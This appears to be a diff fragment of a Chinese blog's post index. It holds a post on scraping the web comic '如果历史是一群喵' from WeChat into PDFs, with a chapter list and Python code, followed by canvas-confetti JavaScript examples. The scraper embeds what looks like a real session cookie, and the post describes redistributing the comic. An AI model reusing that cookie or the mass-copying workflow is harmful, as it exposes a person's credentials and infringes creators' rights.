    第十八回吴越相争
    第十九回三家分晋
    第二十回商鞅变法
    第二十一回六国合纵
    第二十二回以横破纵
    第二十三回昭王称霸
    第二十四回乱世巨贾
    第二十五回新王登基
    第二十六回千秋一统

    第三卷 秦楚两汉

    回数标题
    第二十七回风暴前夕
    第二十八回揭竿而起
    第二十九回霸王诞生
    第三十回大风起兮
    第三十一回双雄并立
    第三十二回楚汉争雄
    第三十三回吕氏专政
    第三十四回文景之治
    第三十五回汉武大帝
    第三十六回王莽代汉
    第三十七回风起绿林
    第三十八回光武复国

    第四卷 东汉末年

    回数标题
    第三十九回黄昏时刻
    第四十回乱世重临
    第四十一回关东联军
    第四十二回逐鹿中原
    第四十三回孟德崛起
    第四十四回官渡对峙
    第四十五回统一北方
    第四十六回江东猛虎
    第四十七回孙权守业
    第四十八回没落贵族
    第四十九回必争之地
    第五十回孙刘联盟
    第五十一回赤壁之战

    第五卷 乱世三国

    回数标题
    第五十二回刘备立足
    第五十三回巧取益州
    第五十四回联盟破裂
    第五十五回曹魏代汉
    第五十六回夷陵之战
    第五十七回永安托孤
    第五十八回诸葛治蜀
    第五十九回以攻为守
    第六十回司马侍曹
    第六十一回正始之变
    第六十二回强弩之未
    第六十三回同归于晋
    第六十四回暗流涌动

    第六卷 魏晋南北

    回数标题
    第六十五回烈烈南风
    第六十六回八王之乱
    第六十七回刘汉灭晋
    第六十八回苻氏争雄
    第六十九回淝水之战
    第七十回刘裕建业
    第七十一回威服八方
    第七十二回仓皇北顾
    第七十三回太和改制
    第七十四回孝文改革
    第七十五回北魏分裂
    第七十六回杨氏建隋
    第七十七回南北归一

    第七卷 隋唐风云

    回数标题
    第七十八回开皇之治
    第七十九回储君之争
    第八十回大业难成
    第八十一回潜龙在渊
    第八十二回李氏崛起
    第八十三回雄鹰展翅
    第八十四回喋血禁门
    第八十五回贞观之治
    第八十六回日月临空
    第八十七回武周女皇
    第八十八回韦后专权
    第八十九回太平公主

    第八卷 盛世大唐

    回数标题
    第九十回先天政变
    第九十一回开元之治
    第九十二回边疆兵变
    第九十三回卷土重来
    第九十四回代宗平乱
    第九十五回藩镇割据
    第九十六回元和中兴
    第九十七回甘露之变
    第九十八回朋党之争
    第九十九回黄巢起义
    第一百回朱温叛变
    第一百零一回盛唐终声

    第九卷 五代十国

    回数标题
    第一百零二回后唐灭梁
    第一百零三回邺都之变
    第一百零四回契丹崛起
    第一百零五回引狼入室
    第一百零六回辽朝入主
    第一百零七回后汉建立
    第一百零八回郭氏开国
    第一百零九回世宗革新
    第一百一十回南唐兴起
    第一百一十一回南北一战
    第一百一十二回陈桥兵变
    第一百一十三回平定四方

    第十卷 宋辽金夏

    回数标题
    第一百一十四回宋初集权
    第一百一十五回烛影斧声
    第一百一十六回萧后兴辽
    第一百一十七回澶渊之盟
    第一百一十八回党项崛起
    第一百一十九回元昊立夏
    第一百二十回庆历和议
    第一百二十一回熙宁变法
    第一百二十二回元祐更化
    第一百二十三回女真建国
    第一百二十四回辽灭金兴
    第一百二十五回靖康之变

    第十一卷 南宋金元

    回数标题
    第一百二十六回尽忠报国
    第一百二十七回绍兴和议
    第一百二十八回海陵夺位
    第一百二十九回采石之战
    第一百三十回隆兴和议
    第一百三十一回乾淳之治
    第一百三十二回一代天骄
    第一百三十三回蒙古扩张
    第一百三十四回蒙古灭金
    第一百三十五回端平入洛
    第一百三十六回元朝建立
    第一百三十七回混一天下

    第十二卷 元末明初

    回数标题
    第一百三十八回世祖立制
    第一百三十九回成宗之立
    第一百四十回权臣乱政
    第一百四十一回旧政更化
    第一百四十二回红巾起义
    第一百四十三回高邮之战
    第一百四十四回察罕伐宋
    第一百四十五回崛起布衣
    第一百四十六回荆楚之雄
    第一百四十七回略定南方
    第一百四十八回统一方夏
    第一百四十九回洪武之治

    第十三卷 大明皇朝

    回数标题
    第一百五十回接班之难
    第一百五十一回建文削藩
    第一百五十二回靖难之役
    第一百五十三回永乐大帝
    第一百五十四回仁宣之治
    第一百五十五回土木之变
    第一百五十六回少保破敌
    第一百五十七回夺门之变
    第一百五十八回宪宗继业
    第一百五十九回武宗驭国
    第一百六十回大礼之争
    第一百六十一回功业中辍

    第十四卷 明末清初

    回数标题
    第一百六十二回威震海疆
    第一百六十三回江陵权柄
    第一百六十四回神宗怠政
    第一百六十五回女真之叛
    第一百六十六回一战定业
    第一百六十七回宁远之战
    第一百六十八回天启党争
    第一百六十九回崇祯新政
    第一百七十回十面之网
    第一百七十一回崇德建清
    第一百七十二回松锦之战
    第一百七十三回大顺灭明

    列表

    1. 如果历史是一群喵
    2. 如果历史是一群喵 | 祖先喵们的统一战争
    3. 吃饭穿衣,竟然都是皇上教的!
    4. 他年少丧父,被迫子承父业,最后靠湿身建立了一个国家
    5. 天下都是我家哒!
    6. 跟你讲一下三千多年前的狗血剧
    7. 他进过局子,装过孙子,最后竟成了天王老子
    8. 这真的只是一段纯洁的君臣关系
    9. 让基友管家,让老婆打架,牛逼的国王就是这么奇葩
    10. 这个锅,他背了几千年…
    11. 猥琐发育,不要浪…
    12. 没想到吧!你经常梦见的男人竟然是个玛丽苏…
    13. 惹怒娘家丢江山,皆因作风不检点
    14. 奉天子以令诸侯,我说的不是曹操…
    15. 他爸追杀他,他弟也追杀他,可他成了霸主…
    16. 一个有心机的肥宅
    17. 倒霉蛋终成霸主…可惜死于暗箭
    18. 两个纠缠不清的男人…
    19. 小弟为何突然叛变,大哥如何阴沟翻船
    20. 发家致富靠砍人…
    21. 一个靠口活横行天下的男人
    22. 秦国的阴谋
    23. 不做我的朋友休想活过今天,做了我的朋友可以活到明天
    24. 做生意这事…他才是史上最强
    25. 刺激,史上第一霸总现在上线了
    26. 举手投降了解下
    27. 到底是谁杀死了秦国
    28. 一场暴雨引发的血案
    29. sorry,他在战场上真的可以为所欲为
    30. 见过流氓创业吗
    31. 流氓打过来了
    32. 昨天你把我踢开,今天我让你狗带
    33. 我的老公是渣男
    34. 父子接力,搞死亲戚
    35. “汉族”因他而得名
    36. 明君的人设,昏君的操作
    37. 那一年,我绿了
    38. 那年,我去了趟河北,结果不得了了……
    39. 读书的果然干不过造谣的
    40. 揭竿起黄巾当立,趁虚入董卓乱国
    41. 一场团战,万万没想到,成了团建……
    42. 是奸雄还是英雄,这个争议他背了一千多年…
    43. 从太监的孙子到称霸一方的军阀,他是怎么做到的呢
    44. 从一起长大的发小,到横行天下的搭档,再到你死我活劲敌
    45. 那年基友想跨过黄河来打我…
    46. 父亲出外务工意外死亡,长子继承家业称霸一方
    47. 父兄双双早逝,单亲少年独撑家业…
    48. 乡村青年创业屡遭挫折,企业老板强留惨遭背叛
    49. 跳个槽而已,前老板竟要追杀他…
    50. 怎么办…只能迎男而上了!
    51. 一把火,改变了三个男人的命运
    52. 刘备借荆州,是怎么一回事?
    53. 君子和小人,刘备究竟是哪一个?
    54. 孙权是不是有点傻白甜?
    55. 【喵咪三国篇】大汉就这么没了 …
    56. 【三国篇下】打完这仗,三国就算开始了~
    57. 刘备死了,凭啥让诸葛亮接班呢
    58. 诸葛亮执政是个什么水平?
    59. 诸葛亮,始终无法胜天半子
    60. 这个男人,熬死了曹操三代人……
    61. 三国里最会演戏的竟然是他…
    62. 三国就这么没了
    63. 曹刘孙这么努力,最后却亏的裤衩都不剩…
    64. 喝酒、炫富、吹牛逼,但我暂时是个好王朝…
    65. 我虽然长得丑…但我老公蠢呀…
    66. 毁掉一个王朝,只需一场家暴…
    67. 五胡十六国是怎么开始的?
    68. 八岁请家教,十二岁当将军,三十八岁就当了天王…
    69. 发生在1600多年前的一场“无间道”…
    70. 东晋就这么完蛋了…
    71. 五胡十六国是怎么结束的?
    72. 南朝实在太“南”了
    73. 发生在北魏的大女主剧
    74. 北魏汉化组登场
    75. 在北魏,最不值钱的可能是皇帝……
    76. 离南北朝结束还差这一个男人
    77. 南北朝就这么结束了
    78. 隋文帝,这个出道即巅峰的男人
    79. 论一个演员的自我修养
    80. 如果隋朝时有劳动节,那劳动者最怕的就是他……
    81. 影帝的表哥,也是个影帝……
    82. 怂一时风平浪静,绕一步天下我有
    83. 李世民登场!
    84. 李世民的坎坷斗争路
    85. 都是摆摊,为啥李世民能用“烂摊子”发财致富?
    86. 要说乘风破浪的姐姐们,她绝对算一个~
    87. 爬最高的山…杀最亲的崽…最后她得到了想要的一切
    88. 她抄作业,终究抄成了自己最讨厌的人…
    89. 人气高业务棒,实力女主硬邦邦
    90. 唐玄宗登场!姑侄之间的对决!
    91. 大唐盛世,基本就是从这开始的~
    92. 大唐历史上最著名的胖子,没有之一
    93. 前后脚遇到两个大忽悠,唐朝真是头都大了…
    94. 唐朝八年的叛乱,终于被这个猛男结束了
    95. 为什么说男人的嘴骗人的鬼,看看大唐你就懂了…
    96. 大唐它又行了…
    97. 老太监,不讲武德,这样不好…
    98. 彻底压垮唐朝的,是一场对家之间的战争…
    99. 历史不断证明,千万不要惹落榜考生…
    100. 我们100话啦!大唐也快完蛋啦~
    101. 这下大唐真的完蛋了…
    102. 大唐完蛋了,五代十国开始了~
    103. 半路被抓去当皇帝是啥感受?
    104. 炎帝后裔、太阳转世、来自北境的契丹之王!
    105. 他因一己私利,将国家推入深渊…
    106. 当会打仗的吃饱了,末日也就到了
    107. 我愿称之为偷塔之王
    108. 他认真打仗,到头全家被端,只能造反当皇帝了
    109. 这应该是五代里最完美的崽了
    110. 五代都讲了,十国又是怎样的呢?
    111. 拳打南唐美男子,脚踹契丹辽睡王,他真是五代皇帝中的一股清流…
    112. 宋朝开始了~
    113. 五代十国篇结束~咱们下季再见~
    114. 历史喵第十季开更啦!
    115. 那天夜里,他们兄弟俩在屋里发生了什么呢?
    116. 这绝对是辽朝的大女主剧…
    117. 本来想欺负孤儿寡母的,没想到对面是个女王大人…
    118. 大宋又双叒因为想占便宜而翻车了…
    119. 大三角!修罗场!最后结局竟是…
    120. 虽然委屈,但大宋又又又跟人和解了…
    121. 王安石变法
    122. 你相信光吗?反正王安石应该是不信的…
    123. 宋辽夏一起摆烂,结果来了个新家伙…
    124. 70万对2万,优势在我,怎么可能输?
    125. 摊上这样一对父子,大宋南了…
    126. 南宋最强的崽登场!
    127. 南宋最强的崽…也救不了南宋啊…
    128. 我想当个好皇帝,但手握男主剧本的是我堂弟…
    129. 本来只是去劳军,却不小心打了胜仗?
    130. 想挺起腰杆子,可惜实力还是不够啊
    131. 打架打不过,只能拼一些内力…
    132. 一代天骄登场!
    133. 你知道成吉思汗有多强悍吗!
    134. 南宋:老子终于报仇了!
    135. 南宋收复中原了!但…又好像没收…
    136. 建立元朝的那个男人,他来了…….
    137. 南宋结束,大元一统
    138. 《元末明初》篇开更!
    139. 皇位谁来坐?别急先开个会
    140. 怎样形容一个权臣的势力大呢?200多个字的头衔!
    141. 能文能武的富二代,大义灭亲打工仔…
    142. 元朝治好了黄河,却冲走了自己
    143. 大元:教科书式的亡国之君出现了
    144. 元朝的危机解除了,但又似乎没有解除…
    145. 元朝最不该惹的就是这个乞丐
    146. 事实证明,卖鱼的都惹不起啊!
    147. 火烧连环船!这说的可不是赤壁之战
    148. 大元谢幕,大明登场!
    149. 明朝的开局,是地狱难度的
    150. 史上最强太子,就是命太短…
    151. 我只是想把位子坐稳,叔叔们吃点苦怎么啦?
    152. 以一府抗一国,史上最强藩王!
    153. 大明最猛皇帝,天子守国门!
    154. 大明圣孙,明朝文武双全型王者
    155. 大明帝六代,如何一战成名?
    156. 受命于危难之际!为大明续命近两百年!
    157. 几百年前的月圆之夜,他和皇位“团圆” 了
    158. 有个乱糟糟的爹,接手一个乱糟糟的天下…
    159. 他明明拥有天下,却似乎更向往自由…
    160. 本以为扶上位的是个傀儡,没想到是个祖宗……
    161. 说好的宫斗爽剧,怎么就成了修仙模拟器?
    162. 传奇名将登场!戚继光为啥这么猛?
    163. 大明第一首辅,救世宰相的铁血改革路!
    164. 孩子管太紧,长大了可能报复性消费…
    165. 东北“王子”复仇记,女真再次登场!
    166. 后金对大明,萨尔浒之战!
    167. 宁远之战!努尔哈赤的滑铁卢
    168. 江山什么的…哪有木工有趣呀…
    169. 好消息:阉党没了!坏消息:大明也快没了
    170. 仗打赢了,但大明的时间也不多了…
    171. 大明已读不回,贵二代趁机爆改!
    172. 明朝最后的豪赌!赌输了…
    173. 放牛娃建立起的皇朝,被放羊娃给灭了
    174. 从孤儿到最强亲王,小王子的翻身之路
    175. 进了京之后,大顺就开始不顺了
    176. 一个月换俩老板是啥体验?
    177. 明末义军领袖,除了快递员,还有个转业的……
    178. 这个皇帝实习期有点长…
    179. 鳌拜:我全都要!康熙:拿来吧你!
    180. 康熙:我要打三个!
    181. 什么是真正的狠人?是61年每天早起…
    182. 夺嫡大舞台!有种你就来!
    183. 雍正:看我怎么用“不争”赢得胜利!
    184. 虽然工龄短,但工作量大呀!

    输出

    爬虫

    ​将上述的网址存到一个列表中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import re

    # 给定的 Markdown 文本
    markdown_text = """
    1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
    2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
    3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
    4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
    5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
    6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
    ...
    """

    # 使用正则表达式提取所有 URL
    urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)

    ​从 利用Python爬取公众号上的图片(附源码) 抄一个代码!然后一阵暴改!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    from tqdm import tqdm
    import requests
    from bs4 import BeautifulSoup
    import time
    import random
    import os

    headers = {
    'cookie':'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
    }

    index = 0

    for url in urls:
    index += 1
    print("第 " + str(index) + ' 章')
    try:
    response = requests.get(url, headers=headers)
    # print(response.status_code) # 打印响应状态码
    # 获取网页数据
    html = response.text

    soup = BeautifulSoup(html, 'html.parser')
    img_list = soup.find_all('img')
    except Exception as e:
    print(f"{index}:错误 - {str(e)}")

    for img_url in tqdm(img_list):
    try:
    name = str(img_list.index(img_url))
    # print(img_url)
    img_link = img_url.get('data-src')
    if img_link != None:
    # print(img_link)
    response2 = requests.get(img_link)
    # 图片是二进制数据,获取要用content,文本文件用text
    img_content = response2.content
    # 设置休眠时间,防止速度过快被封
    time.sleep(random.uniform(3, 5))
    # 保存文件
    folder_path = './如果历史是一群喵/' + '第 '+ str(index) + ' 章'
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    with open(folder_path + '/' + name + '.' + img_link.split('=')[-1],'wb+') as f:
    f.write(img_content)
    f.close()
    # print(f'第 {name} 张图片下载成功')
    except Exception as e:
    print('第 '+ str(index) + ' 章:错误:' + str(e))

    格式化

    ​这里手工洗了一下数据,把部分章节开头的 .gif 图片替换成了 .jpeg 的格式,162 章后的文件名后缀有问题,也进行了修改。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import os

    def rename_files_in_folder(folder_path):
    # 遍历文件夹中的所有文件
    for filename in os.listdir(folder_path):
    # 获取完整文件路径
    old_file = os.path.join(folder_path, filename)

    if os.path.isfile(old_file):
    # 如果文件后缀是 .appmsg,改为 .jpeg
    if filename.endswith('.appmsg'):
    new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
    os.rename(old_file, new_file)

    # 如果文件后缀是 .1,改为 .gif
    elif filename.endswith('.1'):
    new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
    os.rename(old_file, new_file)

    # 使用示例
    folder_path = r'./如果历史是一群喵/第 184 章' # 替换为目标文件夹的路径
    rename_files_in_folder(folder_path)

    ​将爬虫得到的各个图片四周填充白色,使其长宽比与 A4 纸大小一致:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    import os
    import re
    from tqdm import tqdm
    from PIL import Image

    load_path = "./如果历史是一群喵"
    save_path = "./如果历史是一群喵 resized"

    # A4 纵向尺寸在 72 DPI 下的像素大小
    A4_width = 595
    A4_height = 840
    A4_aspect_ratio = A4_width / A4_height

    item_list = os.listdir(load_path)
    item_list.sort(key=lambda x: int(re.search(r'第 (\d+) 章', x).group(1)))

    # 遍历顶层子文件夹
    for item in item_list:
    item_path = os.path.join(load_path, item)
    print(item)
    if os.path.isdir(item_path):
    # 自定义排序函数,提取文件名中的数字部分并按数字排序
    file_list = os.listdir(item_path)
    file_list.sort(key=lambda x: int(re.match(r"(\d+)", x).group(0)))
    # 找到第一个后缀不是 '.jpeg' 的文件,移除该元素及之后的所有元素
    for i, file in enumerate(file_list):
    if not file.endswith('.jpeg'):
    file_list = file_list[:i] # 切片操作,保留列表中 i 之前的元素
    break
    # 创建一个 pdf 对象
    pdf = FPDF()
    for image_file in tqdm(file_list):
    image = Image.open(os.path.join(item_path, image_file))
    # 获取原始图片的宽度和高度
    original_width, original_height = image.size

    # 计算新尺寸比例,保持宽高比不变
    aspect_ratio = original_width / original_height

    # 根据宽高比决定如何调整图片
    if aspect_ratio > A4_aspect_ratio:
    # 图片宽度超出比例限制,调整宽度为 A4 宽度,计算高度
    new_width = A4_width
    new_height = int(new_width / aspect_ratio)
    else:
    # 图片高度超出比例限制,调整高度为 A4 高度,计算宽度
    new_height = A4_height
    new_width = int(new_height * aspect_ratio)

    # 调整图片大小
    resized_image = image.resize((new_width, new_height))

    # 创建一个白色的 A4 背景图像
    background = Image.new('RGB', (A4_width, A4_height), (255, 255, 255))
    # 计算将图片居中放置在 A4 背景中的位置
    left = (A4_width - new_width) // 2
    top = (A4_height - new_height) // 2

    # 将调整后的图片粘贴到背景图像上
    background.paste(resized_image, (left, top))
    # 获取图片的宽度和高度
    width, height = background.size

    folder_path = os.path.join(os.path.join(save_path, item))
    if not os.path.exists(folder_path):
    # 如果文件夹不存在,则创建它
    os.makedirs(folder_path)
    background.save(os.path.join(folder_path, image_file), format="JPEG", quality=80)

    输出 pdf

    ​将上述图片输出成 pdf:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    from fpdf import FPDF
    import re
    import os
    from tqdm import tqdm

    load_path = './如果历史是一群喵 resized/'
    save_path = './如果历史是一群喵 pdf/'

    # 将图像文件转换为 PDF
    def images_to_pdf(image_paths, output_pdf_path):
    pdf = FPDF()
    image_paths.sort(key=lambda x: int(re.search(r'(\d+)\.jpeg', x).group(1)))
    # 遍历所有图像文件
    for image_path in image_paths:
    # 添加新的一页
    pdf.add_page()
    # 插入图片,设置为 A4 尺寸的图像(宽度 210mm,高度 297mm)
    pdf.image(image_path, x=0, y=0, w=210, h=297)

    # 输出 PDF 文件
    pdf.output(output_pdf_path)

    for folder in tqdm(os.listdir(load_path)):
    image_folder = os.path.join(load_path, folder)
    image_paths = [os.path.join(image_folder, f) for f in os.listdir(image_folder)]

    output_pdf_path = os.path.join(save_path, folder + '.pdf') # 输出 PDF 的路径
    images_to_pdf(image_paths, output_pdf_path)

    ​得到最终文件:如果历史是一群喵 pdf_免费高速下载|百度网盘-分享无限制

    ]]>
    @@ -168,7 +168,7 @@ /posts/Web-Canvas-Confetti/ - 资源

    示例

    基础纸屑

    function BasicCannon() {
    confetti({
    particleCount: 100,
    spread: 70,
    origin: { y: 0.6 }
    });
    }

    function RandomDirection() {
    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    confetti({
    angle: randomInRange(55, 125),
    spread: randomInRange(50, 70),
    particleCount: randomInRange(50, 100),
    origin: { y: 0.6 }
    });
    }

    function RealisticLook() {
    var count = 200;
    var defaults = {
    origin: { y: 0.7 }
    };

    function fire(particleRatio, opts) {
    confetti({
    ...defaults,
    ...opts,
    particleCount: Math.floor(count * particleRatio)
    });
    }

    fire(0.25, {
    spread: 26,
    startVelocity: 55,
    });
    fire(0.2, {
    spread: 60,
    });
    fire(0.35, {
    spread: 100,
    decay: 0.91,
    scalar: 0.8
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 25,
    decay: 0.92,
    scalar: 1.2
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 45,
    });
    }

    function Fireworks() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var defaults = { startVelocity: 30, spread: 360, ticks: 60, zIndex: 0 };

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    var interval = setInterval(function () {
    var timeLeft = animationEnd - Date.now();

    if (timeLeft <= 0) {
    return clearInterval(interval);
    }

    var particleCount = 50 * (timeLeft / duration);
    // since particles fall down, start a bit higher than random
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.1, 0.3), y: Math.random() - 0.2 } });
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.7, 0.9), y: Math.random() - 0.2 } });
    }, 250);
    }

    function Stars() {
    var defaults = {
    spread: 360,
    ticks: 50,
    gravity: 0,
    decay: 0.94,
    startVelocity: 30,
    colors: ['FFE400', 'FFBD00', 'E89400', 'FFCA6C', 'FDFFB8']
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 40,
    scalar: 1.2,
    shapes: ['star']
    });

    confetti({
    ...defaults,
    particleCount: 10,
    scalar: 0.75,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    function Snow() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var skew = 1;

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    (function frame() {
    var timeLeft = animationEnd - Date.now();
    var ticks = Math.max(200, 500 * (timeLeft / duration));
    skew = Math.max(0.8, skew - 0.001);

    confetti({
    particleCount: 1,
    startVelocity: 0,
    ticks: ticks,
    origin: {
    x: Math.random(),
    // since particles fall down, skew start toward the top
    y: (Math.random() * skew) - 0.2
    },
    colors: ['#ffffff'],
    shapes: ['circle'],
    gravity: randomInRange(0.4, 0.6),
    scalar: randomInRange(0.4, 1),
    drift: randomInRange(-0.4, 0.4)
    });

    if (timeLeft > 0) {
    requestAnimationFrame(frame);
    }
    }());
    }

    function SchoolPride() {
    var end = Date.now() + (15 * 1000);

    // go Buckeyes!
    var colors = ['#bb0000', '#ffffff'];

    (function frame() {
    confetti({
    particleCount: 2,
    angle: 60,
    spread: 55,
    origin: { x: 0 },
    colors: colors
    });
    confetti({
    particleCount: 2,
    angle: 120,
    spread: 55,
    origin: { x: 1 },
    colors: colors
    });

    if (Date.now() < end) {
    requestAnimationFrame(frame);
    }
    }());
    }

    function CustomShapes() {
    // note: you CAN only use a path for confetti.shapeFrompath(), but for
    // performance reasons it is best to use it once in development and save
    // the result to avoid the performance penalty at runtime

    // pumpkin shape from https://thenounproject.com/icon/pumpkin-5253388/
    var pumpkin = confetti.shapeFromPath({
    path: 'M449.4 142c-5 0-10 .3-15 1a183 183 0 0 0-66.9-19.1V87.5a17.5 17.5 0 1 0-35 0v36.4a183 183 0 0 0-67 19c-4.9-.6-9.9-1-14.8-1C170.3 142 105 219.6 105 315s65.3 173 145.7 173c5 0 10-.3 14.8-1a184.7 184.7 0 0 0 169 0c4.9.7 9.9 1 14.9 1 80.3 0 145.6-77.6 145.6-173s-65.3-173-145.7-173zm-220 138 27.4-40.4a11.6 11.6 0 0 1 16.4-2.7l54.7 40.3a11.3 11.3 0 0 1-7 20.3H239a11.3 11.3 0 0 1-9.6-17.5zM444 383.8l-43.7 17.5a17.7 17.7 0 0 1-13 0l-37.3-15-37.2 15a17.8 17.8 0 0 1-13 0L256 383.8a17.5 17.5 0 0 1 13-32.6l37.3 15 37.2-15c4.2-1.6 8.8-1.6 13 0l37.3 15 37.2-15a17.5 17.5 0 0 1 13 32.6zm17-86.3h-82a11.3 11.3 0 0 1-6.9-20.4l54.7-40.3a11.6 11.6 0 0 1 16.4 2.8l27.4 40.4a11.3 11.3 0 0 1-9.6 17.5z',
    matrix: [0.020491803278688523, 0, 0, 0.020491803278688523, -7.172131147540983, -5.9016393442622945]
    });
    // tree shape from https://thenounproject.com/icon/pine-tree-1471679/
    var tree = confetti.shapeFromPath({
    path: 'M120 240c-41,14 -91,18 -120,1 29,-10 57,-22 81,-40 -18,2 -37,3 -55,-3 25,-14 48,-30 66,-51 -11,5 -26,8 -45,7 20,-14 40,-30 57,-49 -13,1 -26,2 -38,-1 18,-11 35,-25 51,-43 -13,3 -24,5 -35,6 21,-19 40,-41 53,-67 14,26 32,48 54,67 -11,-1 -23,-3 -35,-6 15,18 32,32 51,43 -13,3 -26,2 -38,1 17,19 36,35 56,49 -19,1 -33,-2 -45,-7 19,21 42,37 67,51 -19,6 -37,5 -56,3 25,18 53,30 82,40 -30,17 -79,13 -120,-1l0 41 -31 0 0 -41z',
    matrix: [0.03597122302158273, 0, 0, 0.03597122302158273, -4.856115107913669, -5.071942446043165]
    });
    // heart shape from https://thenounproject.com/icon/heart-1545381/
    var heart = confetti.shapeFromPath({
    path: 'M167 72c19,-38 37,-56 75,-56 42,0 76,33 76,75 0,76 -76,151 -151,227 -76,-76 -151,-151 -151,-227 0,-42 33,-75 75,-75 38,0 57,18 76,56z',
    matrix: [0.03333333333333333, 0, 0, 0.03333333333333333, -5.566666666666666, -5.533333333333333]
    });

    var defaults = {
    scalar: 2,
    spread: 180,
    particleCount: 30,
    origin: { y: -0.1 },
    startVelocity: -35
    };

    confetti({
    ...defaults,
    shapes: [pumpkin],
    colors: ['#ff9a00', '#ff7400', '#ff4d00']
    });
    confetti({
    ...defaults,
    shapes: [tree],
    colors: ['#8d960f', '#be0f10', '#445404']
    });
    confetti({
    ...defaults,
    shapes: [heart],
    colors: ['#f93963', '#a10864', '#ee0b93']
    });
    }

    function Emoji() {
    var scalar = 2;
    var unicorn = confetti.shapeFromText({ text: text, scalar });

    var defaults = {
    spread: 360,
    ticks: 60,
    gravity: 0,
    decay: 0.96,
    startVelocity: 20,
    shapes: [unicorn],
    scalar
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 30
    });

    confetti({
    ...defaults,
    particleCount: 5,
    flat: true
    });

    confetti({
    ...defaults,
    particleCount: 15,
    scalar: scalar / 2,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    function CustomCanvas(id) {
    var canvas = document.getElementById(id);

    // you should only initialize a canvas once, so save this function
    // we'll save it to the canvas itself for the purpose of this demo
    canvas.confetti = canvas.confetti || confetti.create(canvas, { resize: true });

    canvas.confetti({
    spread: 70,
    origin: { y: 1.2 }
    });
    }


    ]]>
    + 资源

    示例

    基础纸屑

    1
    2
    3
    4
    5
    6
    7
    function BasicCannon() {
    confetti({
    particleCount: 100,
    spread: 70,
    origin: { y: 0.6 }
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function RandomDirection() {
    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    confetti({
    angle: randomInRange(55, 125),
    spread: randomInRange(50, 70),
    particleCount: randomInRange(50, 100),
    origin: { y: 0.6 }
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    function RealisticLook() {
    var count = 200;
    var defaults = {
    origin: { y: 0.7 }
    };

    function fire(particleRatio, opts) {
    confetti({
    ...defaults,
    ...opts,
    particleCount: Math.floor(count * particleRatio)
    });
    }

    fire(0.25, {
    spread: 26,
    startVelocity: 55,
    });
    fire(0.2, {
    spread: 60,
    });
    fire(0.35, {
    spread: 100,
    decay: 0.91,
    scalar: 0.8
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 25,
    decay: 0.92,
    scalar: 1.2
    });
    fire(0.1, {
    spread: 120,
    startVelocity: 45,
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
